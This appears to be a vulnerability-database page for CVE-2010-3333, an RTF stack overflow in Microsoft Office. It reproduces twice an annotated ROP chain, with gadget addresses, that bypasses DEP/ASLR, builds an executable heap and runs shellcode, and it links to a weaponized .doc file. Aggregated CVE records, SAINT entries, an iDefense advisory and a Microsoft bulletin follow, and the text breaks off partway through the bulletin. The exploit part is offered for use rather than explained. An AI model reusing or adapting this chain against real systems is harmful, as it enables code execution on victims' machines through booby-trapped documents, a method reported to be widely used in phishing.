MS Office 2010 RTF Header Stack Overflow Vulnerability Exploit
2011-07-04T00:00:00
ID SSV:20685 Type seebug Reporter Root Modified 2011-07-04T00:00:00
Description
No description provided by source.
# Exploit Title: MS Office 2010 RTF Header Stack Overflow Vulnerability
Exploit
# Date: 7/3/2011
# Author: Snake ( Shahriyar.j < at > gmail )
# Version: MS Office <= 2010
# Tested on: MS Office 2010 ( 14.0.4734.1000) - Windows 7
# CVE : CVE-2010-3333
# This is the exploit I wrote for Abysssec "The Arashi" article.
# It gracefully bypass DEP/ASLR in MS Office 2010,
# and we named this method "Ikazuchi DEP/ASRL Bypass" : >
# unfortunately msgr3en.dll loads a few seconds after opining office,
# so just need to open open Office , and then open exploit after a few
second and saw a nice calc.
#
# The Arashi : http://abysssec.com/files/The_Arashi.pdf
http://www.exploit-db.com/download_pdf/17469
# me : twitter.com/ponez
# aslo check here for Persian docs of this methods and more :
http://www.0days.ir/article/
Exploit: http://www.exploit-db.com/sploits/cve-2011-3333_exploit.doc
#
# and the Rop :
3F2CB9E0 POP ECX
RETN
# HeapCreate() IAT = 3F10115C
3F389CA5 MOV EAX,DWORD PTR DS:[ECX]
RETN
# EAX == HeapCreate() Address
3F39AFCF CALL EAX
RETN
# Call HeapCreate() and Create a Executable Heap :D
# after this call, EAX contain our Heap Address.
0x3F2CB9E0 POP ECX
RETN
# pop 0x00008000 into ECX
0x3F39CB46 ADD EAX,ECX
POP ESI
RETN
# add ECX to EAX and instead of calling HeapAlloc,
# now EAX point to the RWX Heap :D
0x3F2CB9E0 POP ECX
RETN
# pop 0x3F3B3DC0 into ECX, it is a writable address.
0x3F2233CC MOV DWORD PTR DS:[ECX],EAX
RETN
# storing our RWX Heap Address into 0x3F3B3DC0 ( ECX ) for
further use ;)
0x3F2D59DF POP EAX
ADD DWORD PTR DS:[EAX],ESP
RETN
# pop 0x3F3B3DC4 into EAX , it is writable address with zero!
# then we add ESP to the Zero which result in storing ESP into
that address,
# we need ESP address for copying shellcode ( which stores in
Stack ),
# and we have to get it dynamically at run-time, now with my
tricky instruction, we have it!
0x3F2F18CC POP EAX
RETN
# pop 0x3F3B3DC4 ( ESP address ) into EAX
0x3F2B745E MOV ECX,DWORD PTR DS:[EAX]
RETN
# now ECX point to nearly offset of Stack.
0x3F39795E POP EDX
RETN
# pop 0x00000024 into EDX
0x3F39CB44 ADD ECX,EDX
ADD EAX,ECX
POP ESI
RETN
# add 0x24 to ECX ( Stack address )
0x3F398267 MOV EAX,ECX
RETN
# EAX = ECX ; )
0x3F3A16DE MOV DWORD PTR DS:[ECX],EAX
XOR EAX,EAX
POP ESI
RETN
# mov EAX ( Stack Address + 24 = Current ESP value ) into the
current Stack Location,
# and the popping it into ESI ! now ESI point where shellcode
stores in stack :D
0x3F398267 MOV EAX,ECX
RETN
# EAX = ECX ; )
3F2CB9E0 POP ECX
RETN
# pop 0x3F3B3DC0 ( Saved Heap address ) into ECX
0x3F389CA5 MOV EAX,DWORD PTR DS:[ECX]
RETN
# now EAX point to our RWX Heap
0x3F2B0A7C XCHG EAX,EDI
RETN 4
# EDI = Our RWX Heap Address
3F2CB9E0 POP ECX
RETN
# pop 0x3F3B3DC0 ( Saved Heap address ) into ECX
0x3F389CA5 MOV EAX,DWORD PTR DS:[ECX]
RETN
# now EAX point to our RWX Heap
0x3F38BEFB ADD AL,58
RETN
# just skip some junks ; )
3F2CB9E0 POP ECX
RETN
# pop 0x00000080 into ECX ( 0x80 * 4 = 0x200 = Copy lent )
3F3441B4 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
POP EDI
POP ESI
RETN
# Copy shellcode from stack into RWX Heap
3F39AFCF CALL EAX
RETN
# KABOOM !!!
Exploit: http://www.exploit-db.com/sploits/cve-2011-3333_exploit.doc
{"href": "https://www.seebug.org/vuldb/ssvid-20685", "status": "poc", "bulletinFamily": "exploit", "modified": "2011-07-04T00:00:00", "title": "MS Office 2010 RTF Header Stack Overflow Vulnerability Exploit", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-20685", "cvelist": ["CVE-2010-3333", "CVE-2011-3333"], "description": "No description provided by source.", "viewCount": 7, "published": "2011-07-04T00:00:00", "sourceData": "\n # Exploit Title: MS Office 2010 RTF Header Stack Overflow Vulnerability\r\nExploit\r\n# Date: 7/3/2011\r\n# Author: Snake ( Shahriyar.j < at > gmail )\r\n# Version: MS Office <= 2010\r\n# Tested on: MS Office 2010 ( 14.0.4734.1000) - Windows 7\r\n# CVE : CVE-2010-3333\r\n \r\n# This is the exploit I wrote for Abysssec "The Arashi" article.\r\n# It gracefully bypass DEP/ASLR in MS Office 2010,\r\n# and we named this method "Ikazuchi DEP/ASRL Bypass" : >\r\n# unfortunately msgr3en.dll loads a few seconds after opining office,\r\n# so just need to open open Office , and then open exploit after a few\r\nsecond and saw a nice calc.\r\n#\r\n# The Arashi : http://abysssec.com/files/The_Arashi.pdf\r\n http://www.exploit-db.com/download_pdf/17469\r\n \r\n# me : twitter.com/ponez\r\n# aslo check here for Persian docs of this methods and more :\r\nhttp://www.0days.ir/article/\r\n \r\nExploit: http://www.exploit-db.com/sploits/cve-2011-3333_exploit.doc\r\n \r\n \r\n#\r\n# and the Rop :\r\n \r\n3F2CB9E0 POP ECX\r\n RETN\r\n # HeapCreate() IAT = 3F10115C\r\n \r\n3F389CA5 MOV EAX,DWORD PTR DS:[ECX]\r\n RETN\r\n # EAX == HeapCreate() Address\r\n \r\n3F39AFCF CALL EAX\r\n RETN\r\n # Call HeapCreate() and Create a Executable Heap :D\r\n # after this call, EAX contain our Heap Address.\r\n \r\n0x3F2CB9E0 POP ECX\r\n RETN\r\n # pop 0x00008000 into ECX\r\n \r\n0x3F39CB46 ADD EAX,ECX\r\n POP ESI\r\n RETN\r\n # add ECX to EAX and instead of calling HeapAlloc,\r\n # now EAX point to the RWX Heap :D\r\n \r\n0x3F2CB9E0 POP ECX\r\n RETN\r\n # pop 0x3F3B3DC0 into ECX, it is a writable address.\r\n \r\n0x3F2233CC MOV DWORD PTR DS:[ECX],EAX\r\n RETN\r\n # storing our RWX Heap Address into 0x3F3B3DC0 ( ECX ) for\r\nfurther use ;)\r\n \r\n0x3F2D59DF POP EAX\r\n ADD DWORD PTR DS:[EAX],ESP\r\n RETN\r\n # pop 0x3F3B3DC4 into EAX , it is writable address with zero!\r\n # then we add ESP to the Zero which result in storing ESP into\r\nthat address,\r\n # we need ESP address for copying shellcode ( which stores in\r\nStack ),\r\n # and we have to get it dynamically at run-time, now with my\r\ntricky instruction, we have it!\r\n \r\n \r\n0x3F2F18CC POP EAX\r\n RETN\r\n # pop 0x3F3B3DC4 ( ESP address ) into EAX\r\n \r\n \r\n0x3F2B745E MOV ECX,DWORD PTR DS:[EAX]\r\n RETN\r\n # now ECX point to nearly offset of Stack.\r\n \r\n0x3F39795E POP EDX\r\n RETN\r\n # pop 0x00000024 into EDX\r\n \r\n0x3F39CB44 ADD ECX,EDX\r\n ADD EAX,ECX\r\n POP ESI\r\n RETN\r\n # add 0x24 to ECX ( Stack address )\r\n \r\n0x3F398267 MOV EAX,ECX\r\n RETN\r\n # EAX = ECX ; )\r\n \r\n0x3F3A16DE MOV DWORD PTR DS:[ECX],EAX\r\n XOR EAX,EAX\r\n POP ESI\r\n RETN\r\n # mov EAX ( Stack Address + 24 = Current ESP value ) into the\r\ncurrent Stack Location,\r\n # and the popping it into ESI ! now ESI point where shellcode\r\nstores in stack :D\r\n \r\n0x3F398267 MOV EAX,ECX\r\n RETN\r\n # EAX = ECX ; )\r\n \r\n3F2CB9E0 POP ECX\r\n RETN\r\n # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX\r\n \r\n0x3F389CA5 MOV EAX,DWORD PTR DS:[ECX]\r\n RETN\r\n # now EAX point to our RWX Heap\r\n \r\n0x3F2B0A7C XCHG EAX,EDI\r\n RETN 4\r\n # EDI = Our RWX Heap Address\r\n \r\n \r\n3F2CB9E0 POP ECX\r\n RETN\r\n # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX\r\n \r\n \r\n0x3F389CA5 MOV EAX,DWORD PTR DS:[ECX]\r\n RETN\r\n # now EAX point to our RWX Heap\r\n \r\n0x3F38BEFB ADD AL,58\r\n RETN\r\n # just skip some junks ; )\r\n \r\n3F2CB9E0 POP ECX\r\n RETN\r\n # pop 0x00000080 into ECX ( 0x80 * 4 = 0x200 = Copy lent )\r\n \r\n3F3441B4 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]\r\n POP EDI\r\n POP ESI\r\n RETN\r\n # Copy shellcode from stack into RWX Heap\r\n \r\n \r\n3F39AFCF CALL EAX\r\n RETN\r\n # KABOOM !!!\r\n \r\nExploit: http://www.exploit-db.com/sploits/cve-2011-3333_exploit.doc\r\n\n ", "id": "SSV:20685", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T18:02:10", "reporter": "Root", "enchantments": {"score": {"value": 8.0, "vector": "NONE", "modified": "2017-11-19T18:02:10", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-3333"]}, {"type": "attackerkb", "idList": ["AKB:EF06DFEA-51B0-4EEF-853F-DF7BB23652F6"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:095716821BD1E68073429FABC0094CEF"]}, {"type": "saint", "idList": ["SAINT:87747EDA7232EAC177AAACAB996B902A", "SAINT:0D5E6B5FD2A6D55DB607E0CAA6894200", "SAINT:1C3A20B778001D2044C60E107B2E9BB4"]}, {"type": "exploitdb", "idList": ["EDB-ID:18334", "EDB-ID:17474", "EDB-ID:24526", "EDB-ID:16686"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:25106", "SECURITYVULNS:DOC:25114", "SECURITYVULNS:VULN:11248"]}, {"type": "threatpost", "idList": ["THREATPOST:4474B9334E9322D775C57232CC4127EF", "THREATPOST:C0872257AF615C3542B0C9F0BAE4A57D", "THREATPOST:67D34DEB790B708B10391D13A8BE6EAB", "THREATPOST:551363592C0C853E266999644B3579E4", "THREATPOST:4A77E471AA7DA847C227B575A8681E66", "THREATPOST:23B92BF326746339F6B36D64AEB2D5F6", "THREATPOST:5DA1737F4321D42086053820C84CCFB0", "THREATPOST:3C3169D334DC65F9EAF925A5796C7ECF"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:97153"]}, {"type": "seebug", "idList": ["SSV:20246"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/MS10_087_RTF_PFRAGMENTS_BOF"]}, {"type": "zdt", "idList": ["1337DAY-ID-21830"]}, {"type": "thn", "idList": ["THN:B02C7C78600ED331232ABD4D1F8D2C4A", "THN:3BF9400C51248462741DFA3EAF706DEE"]}, {"type": "nessus", "idList": ["MACOSX_MS_OFFICE_NOV2010.NASL", "SMB_NT_MS10-087.NASL"]}, {"type": "fireeye", "idList": ["FIREEYE:E267B700204EA085E6CF4FEBA0C989D3", "FIREEYE:38120E3D3979DCD57297419690545DDD"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310901166", "OPENVAS:901166"]}, {"type": "mskb", "idList": ["KB2423930"]}, {"type": "kitploit", "idList": ["KITPLOIT:4573857264821982104"]}, {"type": "n0where", "idList": ["N0WHERE:172361"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994516"]}], "modified": "2017-11-19T18:02:10", "rev": 2}, "vulnersScore": 8.0}, "references": []}
{"attackerkb": [{"lastseen": "2020-11-18T06:43:55", "bulletinFamily": "info", "cvelist": ["CVE-2010-3333"], "description": "Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via crafted RTF data, aka \u201cRTF Stack Buffer Overflow Vulnerability.\u201d\n\n \n**Recent assessments:** \n \n**dmelcher5151** at April 15, 2020 4:16pm UTC reported:\n\nWas the bread and butter for many phishing campaigns for years.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 4\n", "modified": "2020-07-30T00:00:00", "published": "2010-11-10T00:00:00", "id": "AKB:EF06DFEA-51B0-4EEF-853F-DF7BB23652F6", "href": "https://attackerkb.com/topics/0WUhS2vPZJ/cve-2010-3333", "type": "attackerkb", "title": "CVE-2010-3333", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2020-10-03T11:57:28", "description": "Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via crafted RTF data, aka \"RTF Stack Buffer Overflow Vulnerability.\"", "edition": 3, "cvss3": {}, "published": "2010-11-10T03:00:00", "title": "CVE-2010-3333", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3333"], "modified": "2018-10-12T21:58:00", "cpe": ["cpe:/a:microsoft:office:2008", "cpe:/a:microsoft:office:2003", "cpe:/a:microsoft:office:2007", "cpe:/a:microsoft:open_xml_file_format_converter:*", "cpe:/a:microsoft:office:2010", "cpe:/a:microsoft:office:2011", "cpe:/a:microsoft:office:2004", "cpe:/a:microsoft:office:xp"], "id": "CVE-2010-3333", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3333", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:open_xml_file_format_converter:*:*:mac:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2003:sp3:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2004:*:mac:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2011:*:mac:*:*:*:*:*", "cpe:2.3:a:microsoft:office:xp:sp3:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2010:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2008:*:mac:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2007:sp2:*:*:*:*:*:*"]}], "exploitpack": [{"lastseen": "2020-04-01T19:04:32", "description": "\nMicrosoft Office 2010 - .RTF Header Stack Overflow", "edition": 1, "published": "2011-07-03T00:00:00", "title": "Microsoft Office 2010 - .RTF Header Stack Overflow", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3333", "CVE-2011-3333"], "modified": "2011-07-03T00:00:00", "id": "EXPLOITPACK:095716821BD1E68073429FABC0094CEF", "href": "", "sourceData": "# Exploit Title: MS Office 2010 RTF Header Stack Overflow Vulnerability\nExploit\n# Date: 7/3/2011\n# Author: Snake ( Shahriyar.j < at > gmail )\n# Version: MS Office <= 2010\n# Tested on: MS Office 2010 ( 14.0.4734.1000) - Windows 7\n# CVE : CVE-2010-3333\n\n# This is the exploit I wrote for Abysssec \"The Arashi\" article.\n# It gracefully bypass DEP/ASLR in MS Office 2010,\n# and we named this method \"Ikazuchi DEP/ASRL Bypass\" : >\n# unfortunately msgr3en.dll loads a few seconds after opining office,\n# so just need to open open Office , and then open exploit after a few second and saw a nice calc.\n#\n# The Arashi : http://abysssec.com/files/The_Arashi.pdf\n# http://www.exploit-db.com/docs/17469.pdf\n#\n# me : twitter.com/ponez\n# aslo check here for Persian docs of this methods and more :\n# http://www.0days.ir/article/\n\n\n\n#\n# and the Rop :\n\n3F2CB9E0 POP ECX\n RETN\n # HeapCreate() IAT = 3F10115C\n\n3F389CA5 MOV EAX,DWORD PTR DS:[ECX]\n RETN\n # EAX == HeapCreate() Address\n\n3F39AFCF CALL EAX\n RETN\n # Call HeapCreate() and Create a Executable Heap :D\n # after this call, EAX contain our Heap Address.\n\n0x3F2CB9E0 POP ECX\n RETN\n # pop 0x00008000 into ECX\n\n0x3F39CB46 ADD EAX,ECX\n POP ESI\n RETN\n # add ECX to EAX and instead of calling HeapAlloc,\n # now EAX point to the RWX Heap :D\n\n0x3F2CB9E0 POP ECX\n RETN\n # pop 0x3F3B3DC0 into ECX, it is a writable address.\n\n0x3F2233CC MOV DWORD PTR DS:[ECX],EAX\n RETN\n # storing our RWX Heap Address into 0x3F3B3DC0 ( ECX ) for\nfurther use ;)\n\n0x3F2D59DF POP EAX\n ADD DWORD PTR DS:[EAX],ESP\n RETN\n # pop 0x3F3B3DC4 into EAX , it is writable address with zero!\n # then we add ESP to the Zero which result in storing ESP into\nthat address,\n # we need ESP address for copying shellcode ( which stores in\nStack ),\n # and we have to get it dynamically at run-time, now with my\ntricky instruction, we have it!\n\n\n0x3F2F18CC POP EAX\n RETN\n # pop 0x3F3B3DC4 ( ESP address ) into EAX\n\n\n0x3F2B745E MOV ECX,DWORD PTR DS:[EAX]\n RETN\n # now ECX point to nearly offset of Stack.\n\n0x3F39795E POP EDX\n RETN\n # pop 0x00000024 into EDX\n\n0x3F39CB44 ADD ECX,EDX\n ADD EAX,ECX\n POP ESI\n RETN\n # add 0x24 to ECX ( Stack address )\n\n0x3F398267 MOV EAX,ECX\n RETN\n # EAX = ECX ; )\n\n0x3F3A16DE MOV DWORD PTR DS:[ECX],EAX\n XOR EAX,EAX\n POP ESI\n RETN\n # mov EAX ( Stack Address + 24 = Current ESP value ) into the\ncurrent Stack Location,\n # and the popping it into ESI ! now ESI point where shellcode\nstores in stack :D\n\n0x3F398267 MOV EAX,ECX\n RETN\n # EAX = ECX ; )\n\n3F2CB9E0 POP ECX\n RETN\n # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX\n\n0x3F389CA5 MOV EAX,DWORD PTR DS:[ECX]\n RETN\n # now EAX point to our RWX Heap\n\n0x3F2B0A7C XCHG EAX,EDI\n RETN 4\n # EDI = Our RWX Heap Address\n\n\n3F2CB9E0 POP ECX\n RETN\n # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX\n \n\n0x3F389CA5 MOV EAX,DWORD PTR DS:[ECX]\n RETN\n # now EAX point to our RWX Heap\n\n0x3F38BEFB ADD AL,58\n RETN\n # just skip some junks ; )\n\n3F2CB9E0 POP ECX\n RETN\n # pop 0x00000080 into ECX ( 0x80 * 4 = 0x200 = Copy lent )\n\n3F3441B4 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]\n POP EDI\n POP ESI\n RETN\n # Copy shellcode from stack into RWX Heap\n\n\n3F39AFCF CALL EAX\n RETN\n # KABOOM !!!\n\n\n\n\n\nExploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17474.doc (cve-2011-3333_exploit.doc)", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2016-10-03T15:01:58", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3333"], "description": "Added: 11/16/2010 \nCVE: [CVE-2010-3333](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3333>) \nBID: [44652](<http://www.securityfocus.com/bid/44652>) \nOSVDB: [69085](<http://www.osvdb.org/69085>) \n\n\n### Background\n\n[Microsoft Office](<http://office.microsoft.com>) is a package which provides word processing, spreadsheet, presentation, e-mail, and calendaring capabilities for Microsoft Windows workstations. \n\n### Problem\n\nA stack buffer overflow vulnerability exists when Microsoft Word parses RTF documents. The vulnerability is due to lack of input validation when handling the values set for the `**pFragments**` property. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 10-087](<http://www.microsoft.com/technet/security/bulletin/MS10-087.mspx>). \n\n### References\n\n<http://secunia.com/advisories/38521/> \n\n\n### Limitations\n\nExploit works on Microsoft Office Word 2002 SP3, Word 2003 SP3, and Word 2007 SP2. \n\nThe user must open the exploit file in Microsoft Word on the target system. \n\n### Platforms\n\nWindows XP \nWindows Vista \n \n\n", "edition": 1, "modified": "2010-11-16T00:00:00", "published": "2010-11-16T00:00:00", "id": "SAINT:87747EDA7232EAC177AAACAB996B902A", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/ms_office_rtf_pfragments_property", "type": "saint", "title": "Microsoft Office RTF pFragments Property Stack Buffer Overflow", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T17:19:56", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3333"], "edition": 2, "description": "Added: 11/16/2010 \nCVE: [CVE-2010-3333](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3333>) \nBID: [44652](<http://www.securityfocus.com/bid/44652>) \nOSVDB: [69085](<http://www.osvdb.org/69085>) \n\n\n### Background\n\n[Microsoft Office](<http://office.microsoft.com>) is a package which provides word processing, spreadsheet, presentation, e-mail, and calendaring capabilities for Microsoft Windows workstations. \n\n### Problem\n\nA stack buffer overflow vulnerability exists when Microsoft Word parses RTF documents. The vulnerability is due to lack of input validation when handling the values set for the `**pFragments**` property. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 10-087](<http://www.microsoft.com/technet/security/bulletin/MS10-087.mspx>). \n\n### References\n\n<http://secunia.com/advisories/38521/> \n\n\n### Limitations\n\nExploit works on Microsoft Office Word 2002 SP3, Word 2003 SP3, and Word 2007 SP2. \n\nThe user must open the exploit file in Microsoft Word on the target system. \n\n### Platforms\n\nWindows XP \nWindows Vista \n \n\n", "modified": "2010-11-16T00:00:00", "published": "2010-11-16T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/ms_office_rtf_pfragments_property", "id": "SAINT:0D5E6B5FD2A6D55DB607E0CAA6894200", "type": "saint", "title": "Microsoft Office RTF pFragments Property Stack Buffer Overflow", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:34", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3333"], "description": "Added: 11/16/2010 \nCVE: [CVE-2010-3333](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3333>) \nBID: [44652](<http://www.securityfocus.com/bid/44652>) \nOSVDB: [69085](<http://www.osvdb.org/69085>) \n\n\n### Background\n\n[Microsoft Office](<http://office.microsoft.com>) is a package which provides word processing, spreadsheet, presentation, e-mail, and calendaring capabilities for Microsoft Windows workstations. \n\n### Problem\n\nA stack buffer overflow vulnerability exists when Microsoft Word parses RTF documents. The vulnerability is due to lack of input validation when handling the values set for the `**pFragments**` property. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 10-087](<http://www.microsoft.com/technet/security/bulletin/MS10-087.mspx>). \n\n### References\n\n<http://secunia.com/advisories/38521/> \n\n\n### Limitations\n\nExploit works on Microsoft Office Word 2002 SP3, Word 2003 SP3, and Word 2007 SP2. \n\nThe user must open the exploit file in Microsoft Word on the target system. \n\n### Platforms\n\nWindows XP \nWindows Vista \n \n\n", "edition": 4, "modified": "2010-11-16T00:00:00", "published": "2010-11-16T00:00:00", "id": "SAINT:1C3A20B778001D2044C60E107B2E9BB4", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ms_office_rtf_pfragments_property", "title": "Microsoft Office RTF pFragments Property Stack Buffer Overflow", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:37", "bulletinFamily": "software", "cvelist": ["CVE-2010-3333"], "description": "iDefense Security Advisory 11.09.10\r\nhttp://labs.idefense.com/intelligence/vulnerabilities/\r\nNov 09, 2010\r\n\r\nI. BACKGROUND\r\n\r\nMicrosoft Word is a word processing application from Microsoft Office.\r\nFor more information about Microsoft Word, see the following website:\r\nhttp://office.microsoft.com/en-us/word/default.aspx\r\n\r\nRich-Text Format (RTF) is a document file format developed by Microsoft\r\nfor cross-platform document interchange.\r\n\r\nII. DESCRIPTION\r\n\r\nRemote exploitation of a stack buffer overflow vulnerability in\r\nMicrosoft Corp.'s Word could allow attackers to execute arbitrary code\r\nunder the privileges of the targeted user.\r\n\r\nThis vulnerability specifically exists in the handling of a specific\r\ncontrol word in an RTF document. Under certain circumstances, Word will\r\ncopy its property strings into a stack buffer without checking the\r\nlength, which causes a stack buffer overflow.\r\n\r\nIII. ANALYSIS\r\n\r\nExploitation allows remote attackers to execute arbitrary code on the\r\naffected host under the context of the user who opened the malicious\r\nRTF document with Microsoft Word.\r\n\r\nExploitation might require that the user open a specially crafted RTF\r\ndocument with a vulnerable application. The most likely exploitation\r\nvector involves convincing a user to open an RTF document sent to the\r\nuser via e-mail or linked on a website.\r\n\r\nSince Outlook 2007 uses the Word engine to process e-mails, it is also\r\naffected by this vulnerability. The attacker can send the user a\r\nspecially crafted RTF e-mail. When this e-mail is opened or displayed\r\nin the preview pane using Outlook 2007, the vulnerability will be\r\ntriggered.\r\n\r\nIV. DETECTION\r\n\r\niDefense has confirmed the existence of this vulnerability in Microsoft\r\nWord 2003, Microsoft Word 2007, and Microsoft Outlook 2007. The\r\nfollowing Microsoft products are vulnerable:\r\n\r\n * Microsoft Office XP SP 3\r\n * Microsoft Office 2003 SP 3\r\n * Microsoft Office 2007 SP 2\r\n * Microsoft Office 2010 (32-bit editions)\r\n * Microsoft Office 2010 (64-bit editions)\r\n * Microsoft Office for Mac 2011\r\n\r\nV. WORKAROUND\r\n\r\nMicrosoft recommends reading e-mail in plain-text format as a\r\nworkaround.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nMicrosoft Corp. has released patches which address this issue.\r\nInformation about downloadable vendor updates can be found by clicking\r\non the URLs shown.\r\nhttp://www.microsoft.com/technet/security/bulletin/MS10-087.mspx\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nname CVE-2010-3333 to this issue. This is a candidate for inclusion in\r\nthe CVE list (http://cve.mitre.org/), which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n08/12/2009 Initial Vendor Notification\r\n08/12/2009 Initial Vendor Reply\r\n11/09/2010 Coordinated Public Disclosure\r\n\r\nIX. CREDIT\r\n\r\nThis vulnerability was reported to iDefense by wushi of team509.\r\n\r\nGet paid for vulnerability research\r\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\r\n\r\nFree tools, research and upcoming events\r\nhttp://labs.idefense.com/\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright \u00a9 2010 iDefense, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDefense. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically,\r\nplease e-mail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\n There are no warranties with regard to this information. Neither the\r\nauthor nor the publisher accepts any liability for any direct,\r\nindirect, or consequential loss or damage arising from use of, or\r\nreliance on, this information.", "edition": 1, "modified": "2010-11-10T00:00:00", "published": "2010-11-10T00:00:00", "id": "SECURITYVULNS:DOC:25114", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25114", "title": "iDefense Security Advisory 11.09.10: Microsoft Word RTF File Parsing Stack Buffer Overflow Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:37", "bulletinFamily": "software", "cvelist": ["CVE-2010-3336", "CVE-2010-3337", "CVE-2010-3334", "CVE-2010-3335", "CVE-2010-3333"], "description": "Microsoft Security Bulletin MS10-087 - Critical\r\nVulnerabilities in Microsoft Office Could Allow Remote Code Execution (2423930)\r\nPublished: November 09, 2010\r\n\r\nVersion: 1.0\r\nGeneral Information\r\nExecutive Summary\r\n\r\nThis security update resolves one publicly disclosed vulnerability and four privately reported vulnerabilities in Microsoft Office. The most severe vulnerability could allow remote code execution if a user opens or previews a specially crafted RTF e-mail message. An attacker who successfully exploited any of these vulnerabilities could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nThis security update is rated Critical for all supported editions of Microsoft Office 2007 and Microsoft Office 2010. This security update is also rated Important for all supported editions of Microsoft Office XP, Microsoft Office 2003, Microsoft Office 2004 for Mac, Microsoft Office 2008 for Mac, and Microsoft Office for Mac 2011; and Open XML File Format Converter for Mac. For more information, see the subsection, Affected and Non-Affected Software, in this section.\r\n\r\nThe update addresses the vulnerabilities by modifying the way that Microsoft Office software parses files and by helping to ensure a vulnerable component of Microsoft Office uses a more appropriate and secure search order when loading libraries. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.\r\n\r\nRecommendation. Microsoft recommends that customers apply the update immediately.\r\n\r\nKnown Issues. Microsoft Knowledge Base Article 2423930 documents the currently known issues that customers may experience when installing this security update. The article also documents recommended solutions for these issues. When currently known issues and 